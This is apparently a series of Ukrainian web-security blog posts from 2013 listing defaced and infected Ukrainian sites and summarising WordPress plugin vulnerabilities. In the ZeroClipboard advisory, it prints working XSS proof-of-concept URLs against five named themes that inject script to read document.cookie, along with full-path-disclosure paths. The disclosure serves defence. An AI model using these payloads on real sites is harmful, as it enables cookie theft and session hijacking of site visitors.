Websecurity - Веб безпека

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://sumygfu.gov.ua (хакером OverDz) - 25.01.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.dubno-adm.gov.ua (хакером misafir) - 29.01.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://ecopsycholog.com (хакерами з aGa Hackers) - причому спочатку сайт 08.02.2013 був взломаний aGa Hackers, а починаючи з 04.03.2013 він вже взломаний A’Rui. Схоже, що сайт постійно хакається, як і деякі інші сайти в Уанеті
• http://panaboard.kiev.ua (хакером Pokk3rs) - 28.03.2013, зараз сайт вже виправлений адмінами
• http://outplace.kiev.ua (хакерами з Kosova Warriors Group) - 23.02.2013, зараз сайт вже виправлений адмінами

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Events Manager, LeagueManager та Simply Poll. Для котрих з’явилися експлоіти. Events Manager - це плагін для управління та відображення подій, LeagueManager - це плагін для управління спортивними лігами, Simply Poll - це плагін для створення голосувань.

• Multiple XSS vulnerabilities in Events Manager WordPress plugin (деталі)
• WordPress LeagueManager 3.8 SQL Injection (деталі)
• WordPress Simply Poll 1.4.1 CSRF / XSS (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Сьогодні відзначається Міжнародний день Інтернету, а також День веб-майстра. День обраний не випадково, тому що сьогоднішня дата “4.04″ нагадує відому помилку сервера 404, що видається веб сервером, коли документ не знайдений. І з “помилкою 404″ доводиться регулярно зустрічатися усім Інтернет-користувачам . Ось таку цікаву дату обрали для цих свят.

Тому поздоровляю вас з цими святами. І себе також, бо веб розробкою я займаюся вже 14 років - відтоді як зробив у квітні 1999 року свій перший сайт. Тому всім бажаю хороших і головне безпечних сайтів.

Останнє особливо важливо, так як дірявих сайтів в Інтернеті багато. І тому сайти регулярно взламують, дефейсять або розміщують шкідливий код, про що я регулярно пишу в новинах (про найбільш гучні випадки) та в своїх звітах про хакерську активність (про ситуацію в Уанеті). А також веб розробникам потрібно створювати безпечні програми, над чим їм ще довго потрібно працювати, як видно з моїх звітів про веб додатки на інфікованих сайтах. А веб майстрам потрібно обирати безпечні веб додатки для своїх сайтів та проводити аудити безпеки.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://sarepta.com.ua - інфекція була виявлена 13.03.2013. Зараз сайт входить до переліку підозрілих.
• http://catalog.biz.ua - інфекція була виявлена 16.03.2013. Зараз сайт не входить до переліку підозрілих.
• http://ivanenko.zp.ua - інфекція була виявлена 18.02.2013. Зараз сайт не входить до переліку підозрілих.
• http://bereginya.zp.ua - інфекція була виявлена 09.02.2013. Зараз сайт не входить до переліку підозрілих.
• http://swiftprint.com.ua - інфекція була виявлена 16.03.2013. Зараз сайт не входить до переліку підозрілих.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Terillion Reviews та Count Per Day. Для котрих з’явилися експлоіти. Terillion Reviews - це плагін для розміщення оглядів на сайті, Count Per Day - це плагін для ведення статистики відвідувань.

• Stored XSS in Terillion Reviews Wordpress Plugin (деталі)
• WordPress Counter Per Day 3.2.3 DoS / Path Disclosure (деталі)
• WordPress Count-Per-Day 3.2.5 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Інформую вас про останні оновлення на сайті, що були зроблені останнім часом.

Як я вже писав в своїй статті, в лютому я розмістив програму для перевірки обходу фільтрів для проведення XSS атак в розділі Обхід XSS фільтрів. Де ви можете перевірити веб браузери, щоб вияснити які символи вони підтримують для проведення XSS атак.

А в березні я оновив SQL Injection ASCII Encoder. Додав підтримку наступних СУБД: IBM DB2, Postgres SQL і MS Access.

У лютому, 20.02.2013, я знайшов Cross-Site Scripting та Full path disclosure уразливості в темах до WordPress, що містять ZeroClipboard.swf. Також знайшов одну тему, що містить і ZeroClipboard10.swf.

Раніше я писав про Cross-Site Scripting уразливості в ZeroClipboard та про численні вразливі веб додатки з цією флешкою. Як я зазначав, це дуже поширена флешка, що знаходиться на сотнях тисяч веб сайтів і яка використовується в сотнях веб додатків.

Також вона міститься потенційно в сотнях плагінів для WordPress, про що я писав. А також в сотнях тем (шаблонів) для WordPress, включаючи теми зроблені на замовлення окремих сайтів. Серед них Montezuma, Striking, Couponpress, Azolla та Black and White. Та існує багато інших уразливих тем до WordPress з ZeroClipboard.

Cross-Site Scripting (WASC-08):

XSS через параметр id та XSS через копіювання атакуючого коду в буфер обміну (як я описав в попередньому записі).

http://site/wp-content/themes/montezuma/admin/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/wp-content/themes/striking/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/wp-content/themes/couponpress/template_couponpress/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/wp-content/themes/azolla/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/wp-content/themes/black-and-white/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Це дуже поширена флешка. Якщо при стандартному пошуку через Гугл дорки можна знайти десятки тисяч сайтів з ZeroClipboard.swf чи ZeroClipboard10.swf, то при пошуку по темах для WordPress можна знайти майже сто тисяч сайтів з цими флешками.

Full path disclosure (WASC-13):

Також всі зазначені теми мають FPD уразливості в php-файлах (в index.php та інших), що типово для WP тем.

http://site/wp-content/themes/montezuma/

http://site/wp-content/themes/striking/

http://site/wp-content/themes/couponpress/

http://site/wp-content/themes/azolla/

http://site/wp-content/themes/black-and-white/

Вразливі наступні веб додатки з флешкою (всі версії даних тем для WP): Montezuma, Striking, Couponpress, Azolla, Black and White.

Обидві XSS уразливості в ZeroClipboard вже виправлені в останній версії (від нових розробників) ZeroClipboard 1.1.7.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Responsive Logo Slideshow, Pretty Link та Comment Rating. Для котрих з’явилися експлоіти. Responsive Logo Slideshow - це плагін для створення слайдшоу, Pretty Link - це плагін для розміщення гарних лінок, Comment Rating - це плагін для створення рейтингів коментарів.

• Reflective/Stored XSS in Responsive Logo Slideshow Plugin Cross-Site Scripting Vulnerability (деталі)
• WordPress Pretty Link 1.6.3 Cross Site Scripting (деталі)
• WordPress Comment Rating 2.9.32 SQL Injection / Bypass (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.vynogradiv-rda.gov.ua (хакером Sejeal) - 23.01.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.dak.gov.ua (хакером Sejeal) - 23.01.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://ddacore.com (хакером misafir) - 15.01.2013, зараз сайт вже виправлений адмінами
• http://vsesvitn.com.ua (хакером Hmei7) - 12.03.2013, зараз сайт вже виправлений адмінами
• http://volleyball.in.ua (хакером Sejeal) - 15.01.2013, зараз сайт вже виправлений адмінами
• http://pms-carmedia.com (хакером Sejeal) - 23.01.2013, зараз сайт вже виправлений адмінами
• http://volleyballinua.s24.yourdomain.com.ua (хакером ghost-dz) - 17.02.2013, зараз сайт вже виправлений адмінами
• http://24kadra.pp.ua (хакером Aghilas)
• http://www.noomd-pi.org (хакером Ardd’zz)
• http://www.slava-hotel.com.ua (хакерами з Kosova Warriors Group) - 04.03.2013, зараз сайт вже виправлений адмінами

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://dynamomania.com - інфекція була виявлена 28.12.2012. Зараз сайт не входить до переліку підозрілих.
• http://gothic.com.ua - інфекція була виявлена 16.03.2013. Зараз сайт не входить до переліку підозрілих.
• http://gloriamed.com.ua - інфекція була виявлена 09.11.2012. Зараз сайт не входить до переліку підозрілих.
• http://mdpu.org.ua - інфекція була виявлена 06.03.2013. Зараз сайт не входить до переліку підозрілих.
• http://profcom.kiev.ua - інфекція була виявлена 07.03.2013. Зараз сайт входить до переліку підозрілих.
• http://melitopolonline.net - інфекція була виявлена 05.03.2013. Зараз сайт не входить до переліку підозрілих.
• http://avk7.com.ua - інфекція була виявлена 05.03.2013. Зараз сайт не входить до переліку підозрілих.
• http://allindustry.com.ua - інфекція була виявлена 25.03.2013. Зараз сайт не входить до переліку підозрілих.
• http://misto.zp.ua - інфекція була виявлена 20.03.2013. Зараз сайт не входить до переліку підозрілих.
• http://rusfight.pp.ua - інфекція була виявлена 18.02.2013. Зараз сайт не входить до переліку підозрілих.